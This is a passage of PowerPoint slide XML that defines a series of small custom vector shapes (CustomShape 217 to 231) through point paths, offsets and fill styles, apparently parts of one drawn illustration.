                  <a:pt x="6" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="6"/>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29" name="CustomShape 217"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2744640" y="4075200"/>
            <a:ext cx="7560" cy="10800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5" h="7">
                <a:moveTo>
                  <a:pt x="3" y="7"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>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30" name="CustomShape 218"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="3929040"/>
            <a:ext cx="29880" cy="145800"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="92">
                <a:moveTo>
                  <a:pt x="6" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="92"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="89"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="70"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="56"/>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431" name="CustomShape 219"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2827440" y="3909960"/>
            <a:ext cx="42480" cy="163080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="27" h="103">
                <a:moveTo>
                  <a:pt x="27" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="26" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="18"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="73"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="101"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="91"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="0"/>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432" name="CustomShape 220"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2671920" y="3936960"/>
            <a:ext cx="28080" cy="126720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="18" h="80">
                <a:moveTo>
                  <a:pt x="6" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="6" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="80"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="78"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="71"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2"/>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433" name="CustomShape 221"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2673360" y="3944880"/>
            <a:ext cx="21960" cy="109080"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="14" h="69">
                <a:moveTo>
                  <a:pt x="5" y="2"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="67"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="61"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2"/>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434" name="CustomShape 222"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="3954600"/>
            <a:ext cx="18720" cy="88560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="56">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="26"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="1"/>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435" name="CustomShape 223"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2674800" y="3962520"/>
            <a:ext cx="15480" cy="70920"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10" h="45">
                <a:moveTo>
                  <a:pt x="4" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4"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436" name="CustomShape 224"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2678040" y="3971880"/>
            <a:ext cx="10800" cy="50400"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="7" h="32">
                <a:moveTo>
                  <a:pt x="2" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="1"/>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437" name="CustomShape 225"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2828880" y="3919680"/>
            <a:ext cx="37800" cy="142560"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="24" h="90">
                <a:moveTo>
                  <a:pt x="24" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="22" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="43"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="64"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="90"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="88"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="81"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="69"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="41"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="27"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="1"/>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438" name="CustomShape 226"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2830680" y="3930480"/>
            <a:ext cx="29880" cy="120240"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="19" h="76">
                <a:moveTo>
                  <a:pt x="19" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="74"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="68"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="58"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19" y="0"/>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439" name="CustomShape 227"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="3940200"/>
            <a:ext cx="23400" cy="99720"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="15" h="63">
                <a:moveTo>
                  <a:pt x="15" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="15" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="30"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="44"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="63"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="56"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="40"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="8"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15" y="0"/>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440" name="CustomShape 228"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2833560" y="3949560"/>
            <a:ext cx="18720" cy="78840"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="12" h="50">
                <a:moveTo>
                  <a:pt x="12" y="1"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="12" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="50"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="38"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="31"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="15"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="12"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441" name="CustomShape 229"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2835360" y="3960720"/>
            <a:ext cx="14040" cy="56880"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="9" h="36">
                <a:moveTo>
                  <a:pt x="9" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="1"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="3"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="6"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="17"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="22"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="10"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="4"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9" y="0"/>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442" name="CustomShape 230"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639880" y="3944880"/>
            <a:ext cx="6120" cy="186840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>
          </a:solidFill>
          <a:ln w="9360">
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:scrgbClr r="0" g="0" b="0"/>
          </a:effectRef>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="443" name="CustomShape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2706840" y="3941640"/>
            <a:ext cx="72720" cy="87120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="46" h="55">
                <a:moveTo>
                  <a:pt x="4" y="6"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="55"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="53"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="51"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="49"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3" y="46"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="42"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4" y="39"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="35"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="32"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7" y="28"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="25"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11" y="21"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14" y="19"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="16"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="21" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26" y="13"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28" y="12"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="11"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33" y="9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="36" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41" y="5"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="45" y="2"/>
                </a:lnTo>
